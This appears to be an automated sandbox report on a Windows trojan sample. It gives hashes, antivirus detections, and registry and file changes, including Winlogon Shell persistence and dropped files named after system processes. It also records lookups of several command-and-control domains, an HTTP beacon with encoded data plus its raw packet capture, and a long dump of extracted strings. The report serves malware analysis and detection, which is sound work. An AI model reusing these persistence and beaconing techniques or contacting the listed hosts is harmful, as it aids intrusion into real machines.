Analysis Date2014-03-11 20:43:54
MD5c5855ecc9f1fad20977efa4b1d888724
SHA100813eeb21aab96a466b2bfe73a471be3857a7f2

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5cc01921cca01b1e1dc0689d7accf61b sha1: 703dd8a4fc3ba00c997c93ee746ff7ff08288c7f size: 115712
Section.rdata md5: 6cc0b132cc943478c9b720dd130061c4 sha1: 475bd10ec2b988a038d6d4ea751f68c33b14ab58 size: 1536
Section.data md5: 3938205b0cd00066d564b6a8056fcade sha1: db5bc9fa8489a948931203bb0d9706cc9337933f size: 69632
Section.reloc md5: 7a6e9e88324451da01d9ef02f0ff9e75 sha1: 24533100cced95395a842e0d20024c127093716a size: 1024
Timestamp2005-11-29 08:47:37
PEhasha4d2055686b37cd72e40b4935ca215b6afadc343
IMPhash7147d5b1a3625544b54678ed4e32ca9e
AVavgWin32/Cryptor
AVclamavTrojan.Gbot-470
AVmcafeeBackDoor-EXI.gen.r

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSworldmotoblo.com
Winsock DNS127.0.0.1
Winsock DNSjapanesegreenteaonline.com
Winsock DNSfastblogportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSjapanesegreenteaonline.com
Type: A
173.247.248.36
DNSfastblogportal.com
Type: A
DNSworldmotoblo.com
Type: A
HTTP GEThttp://japanesegreenteaonline.com/assets/images/greentea-cha-1.gif?v56=99&tq=gJ4WK%2FSUh7TFlER8oY%2BQtMWTUj26kJH7yZJSPLqVybhqtUn5CGFATA%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 173.247.248.36:80

Raw Pcap
0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   312e6769 663f7635 363d3939 2674713d   1.gif?v56=99&tq=
0x00000030 (00048)   674a3457 4b253246 53556837 54466c45   gJ4WK%2FSUh7TFlE
0x00000040 (00064)   52386f59 25324251 744d5754 556a3236   R8oY%2BQtMWTUj26
0x00000050 (00080)   6b4a4837 795a4a53 504c7156 79626871   kJH7yZJSPLqVybhq
0x00000060 (00096)   74556e35 43474641 54412533 44253344   tUn5CGFATA%3D%3D
0x00000070 (00112)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000080 (00128)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000090 (00144)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x000000a0 (00160)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x000000b0 (00176)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000000c0 (00192)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000000d0 (00208)   2f322e30 0d0a0d0a                     /2.0....


Strings
080904b0
1.0.0.1
1815
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
`````````````
```      
^^^^^^
~~~~~~~~
<<<<<<<((((
>>>>>>>>>>
>@$^*(	
      
               
______
_______
_____________________
------
---------
-----,,,,..
,,,,,,,,
,,,,,,,,,
;;;;;;
;;;;;;;
;;;;;;;;;;;;;;;
::::::::
::::::::::::
:::::::::::::::::::::
!!!!>>>>>
????????
///////
"^^^^^^^^^........
"""""""""
"""""""""''''
)))))))))))))))))))
[[[[[[[
{{{{{{{{{{{{{{{{
}}}}}}}}}}
}}}}}}}}}}}}}}}}}}}}
@@@@@////
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
*************
&&&&&&&
&&&&&&&&&
&&&&&&&&&&&&
###]]]]]]]
########
################
%%%%%%
%%%%%%%%%
+++++++++*
						
							
								
									
												
																			
00&&&&NNNNNLLLLL
(04`Xn
0(`@@)D
0G*QR^
{(  0w
111111111111111
18__]`
1:"arHw.
 @@1BIQ
1Cdu^H`
1`FvZI"
1J|,I-
^?[1KT
1O|dP-q
1O@\L?Xwh
 . `1s
1WA0JO
`1wU\:oI
%~1`|x4R
1yC+C`
2^\0{$
222222
22222222222
2222222222222
22222222222222222222222
2AWg^\
2j_Eb)
%}2w@-W
33333333
3333333333333333
39d7,@
 []3}S	j
4< @@{
444444
44444444444
4444444444444444VVVVVVV###
4444555VVV
`_\~4g
4g3?2H&=*
4i2e9t_
`4(?i2Mge
4j0Mv$m
4  `J2
4;qL_N
@4^<sN
4S;R* 
4sssssssssss
&&&&55
5555555
555555555
555xx77
5*` G `
5%,Uw,
5!&` y
	}+!~!_+6
6;"  \
666666
6666666666
6BZ3.MI
6uJc"@
77777{{{{{{{{{{{{{{{{		
77777777
7?Les[
=7Q8<Z
@ 7TZyE
7vcrd_omE
7wgjzY
.7X\u)
--)7Zr>3
!!!!!8
8bs8(Hh
,@@?:8C
8RRRRRR
999999
99999999((
[[[[9999999999
9999999999999999999ssssppppppp==
99ttttttddddddaarrrrbbbb
9h:YCx
9'QX)8
9sRp*u
9wtE-$
,,,,,,,,,,,a+
A@@@@@@@
a53:y%
aaaaaa
AAAAAA
_	A-Fg
/AFLtS
a[MMMM
--|A\v
  Av?w	
A=ySa9mj
b,  1'tK 
bbbbb~
BBBBBNN
BitBlt
bL^#@j
b#.  N
+BQ'pj
B}U$)\
bw8L>8
bxh7it
bZ5N]@
c<$@@2\
C2IW_B`"-
CC^^^^^
cccccccccc
CCCCCCCCCCC
cccccccccccc}
ccccccccccccccc
~~~~~CCPPP
"C/eW,
~(@`cFD
cLTOZh
CreateCompatibleDC
CreateFileW
cX1$@`\
CXbOLi
?{|CzA$H
@.data
DDDDDDDD
dddddddddddd
DDDDDDDDDDDD
DDDDDDDDDDDDDDDDDD
DeleteCriticalSection
DeleteDC
Dh<_G]P@_
;d\Uc$@
DuplicateHandle
dWl+]+
E::::::
EEEEEEE
eeMMMMMMMMMM
ee(U~	s
eh.dll
Eoq_vN
eq{I=vd
eW"0gO)n
EwI!GH
exGsmR
ExitProcess
f0[Mhp
[f@8.]
 ( @F9
f9`1r0
fA[)GS*
FFFFFF
fffffffffffffffffffff
}}}}}}}fffffffffMMMMMMMMMMMMMMMMMMMMM;;;;
FlushInstructionCache
FormatMessageA
;!F><P#
F. `q"@`
`fU.` 5
$`f?Yq
,` +g-
G0i@}G
@G3.@@
=<g8DH;3
g !8Y_
g B[S(
GetCommandLineA
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetObjectA
GetStartupInfoA
GetTempPathW
GetThreadContext
GetVersionExW
GetWindowsDirectoryW
//GGGG
ggggg11111111111
~~~~~~~gggggggggggg7777
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
g"@ on
gp|O8K#k
guW(  
` |'h]
h;;;;;;;;;;;;;;;
]h$2]&
};|~h9
HeapAlloc
HeapFree
hhhhhhhhhhhhhhhhh"
hL-6b)!stD,
HSU)v=&
&;(h!X
%	i4Mw
i6Wipl 
I]ctzbl
 @id\G3=
IIIIIIIIIIIIIIIII||
I)I @@R
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IU~<c~
IUcX"`;
 J& `%
J6vZ?+
JcbUKV
:[j`cx
`JD7H:
JJJJJB
::::::::::::::___________jjjjjjjj
jjjjjjjjjjj
JJJJJJJJJJJJ???????
jjjjjjjjjjjjjjjjjjjjj
@JJ/T|pg
"@`JmU
@\;J^N
  j~z0
|kay]#
kd)#9a
K@dE?Lk
kdLj_~
KERNEL32.dll
(@`k-g
KKK=<<<<<<<<<<
kkkkkk&&
KSNEE	
kVide7
~k(ww~
%kY<cW
L"~ 7#
LE+:ko
^Li384
L*/IV*
:::||lllll{{{
llllll
LLLLLLLLL
LLLLLLLLLL
llllllllllllllll
LM-gzg
LocalFree
lu^]z&`
^LV8q2J
lYq|G2
M444444444
^ M[}d1
Mfffff
mL||8Y
mm%eeee
mmmmmm
MMMMMM
!!!MMMMMM^
+++))mmmmmmm
MMMMMMMMMM{{{{{{{{{{{hhh
MN>`gw/
;m PK-
'Mq<3B<	
 `Ms<	
MW	p;-k
#n	.@`
N0&@@{Dz
<n4T[fG{
NdrByteCountPointerFree
NJ9j|0J
nnn,,,,,
nnnllllllllll
nnnnnn\
NNNNNNN999999
nnnnnnnnn
nnnnnnnnnn
NNNNNNNNNN
NNNNNNNUUUUUUUUUUUUUUUUUUUUUUUUUU
NoI3Gc
nO/}LC
nWBil4
nx8bZ8@
!"``N_Z
o:1ap;ps8
	o!A5d
ob(I}]
^OGJ|T
o$@`Hb
 OiqJj
ojcAG&
.ONzv:
oo*>>>>>>>
OOOOO^^^A
OOOOOO
OOOOOOOOOOOO
oooooooooooooooo
^^^^^OOOOPPPPP
or"f:R.a
`@oYqe~}
! ``P&`
P2oMu0
/p%>b~
pdE3#K
ph8,wx
P=H@Wz31
_pj>!ds
PMwz;g+
ppppp.
PPPPPPHH^HHPPPPPccccccc
[~pqYG
prR{@&
PsXRb:
,p_%t3
>P#UoG
p^.@`z
}, @q^& 
Q0#L<-
Q3:MKU
Qi6\z?
q   <l6q
qqqq|||||||
;;qqqqq
,QQQQQ
QQQQQQQQ;;
qqqqqUUUUUUU
Q}" `w!
qWd>r_
q!{yXxG_e
QZ1P6.
RaiseException
##r>C\
`.rdata
RealizePalette
.reloc
& `r%H
 R. @lP4
RPCRT4.dll
RpcStringFreeA
rR#^'=C
RRRR}}}}}}}}}}
rrrrrr
rrrrrrrrrrr
==RRRRRRRRRRRRRRRRRRRRRRRRRR
RtlUnwind
R=V,` 
}rZ:Vgr
`?|S5^=
;s8e]e
SelectObject
SelectPalette
SetLastError
SetLocaleInfoW
SetMapMode
SFDywep
SgifsJrw%8
,S`K":8hK[
Sm'p:6
SP(1BL
`@sPzaA
srG ($7O
SSSSSSSSSSSDDDDDD
ssssssssssssssss
StrDupA
StrDupW
StrFormatByteSizeEx
StrRChrA
StrRChrW
StrRetToBSTR
StrRetToBufW
StrRetToStrW
StrStrA
StrStrIA
StrStrIW
StrStrW
StrToInt64ExW
StrToIntA
StrToIntExW
StrToIntW
StrTrimW
`sYVJ]
t|B!Wl
@TcAhQ"
!This program cannot be run in DOS mode.
TKN9e5
` TLHX
TlsSetValue
TMHOX/B
tm,  z
^^^^^^^^^^^^^^TTT=
TTTTT..
TTTTTT
tttttttt
TTTTTTTT
TTTTTTTTTTT
TTTTTTTTTTTTTTTTTTTTTT
ttttttttttttttttttttttt66
U2%E|AA
 U8UOD
:u`C]M
%uH)EM
$@ UjJ
uL||e_
UnrealizeObject
uQdujL
u)qX>e8Nc
UrlApplySchemeA
UrlApplySchemeW
UrlCanonicalizeA
UrlCanonicalizeW
UrlCombineA
UrlCombineW
UrlEscapeA
UrlEscapeW
UrlGetPartW
UrlUnescapeA
UrlUnescapeW
UuidCreate
UuidToStringA
&UUUUU
uuuuuu
UUUUUU&&&&&&&&&&&
uuuuuuuSSSSSSSSSSSSSS/////
u\wUGs
UW<!xJ*
~V&` ;
V3F8A6M
v{C#,V
VerQueryValueA
VERSION.dll
VirtualProtectEx
%V.J|`O
VK:u?u
"VR8+*
vrTuUq
/vS:R&
Vu8p%h
vvaaaGGGGGOOOOO
~~~~~vvvvvvvv
VVVVVVVVV
VVVVVVVVVVV
vwvnsprintfW
vXSy+n;
_[/vxVq$
vz^p|0x
 `w[* 
@@@@@w
W#9$ @
WaitForSingleObject
Wcz[yM
$wdp({
W/h}5@r
.  wI-
 @Wi34
WKK      
wnsprintfA
wnsprintfW
`&wPC/
W~PMFm
WriteProcessMemory
`;wuEe
W[%'Uh
Wv6MI:
W}@VkI
wwGGGG
WWQ" @
>>>>>wwwww
,====wwwww
wwwwwmmmmmOOOOOOOOOOOO
`````wwwwww
WWWWWW
WWWWWWBKK
\x2X;a
_XBOqdF
=-xcQ?
`{XCt}^l
xeurGq
@x-)Hxt
xm*u-*
xnDum>8q;S
X@oWhh
X]Pf)W
xUGQ@`Pi
;xV2C*
xx((((((
xxxmmmmmmTTTTTTlll
XXXXXXXX
{{{{{{{{{{{{xxxxxxxxx
xxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxHHH
Xy'i, 
`@xYTOU
XZQi*/g<a
xzwX4J
Yb[Gc4
Y`CVT=
Ydq F3jk
?Y _,M
[YmqR\
YRRRRRRR
<Y,uj@W
 _y%W#
@@@@@@@(YYY##
yyyyyyyyy
YYYYYYYYY
YYYYYYYYYY
yyyyyyyyyyyyyyyyyy
y-zJ"@
zaVPoA
|,``ZB
zce@* 
z((eeeeeeeeeee
zPv}b;X
ZQN$R-&
ZQ|zCF
Zrrrrrrrrrrrrrrrrrr
Zs\@0Z
ZSY<-^
~~~~ZZZ
ZZZZZZZ
ZZZZZZZZ
zzzzzzzzzzzzzzzzzzqqqqq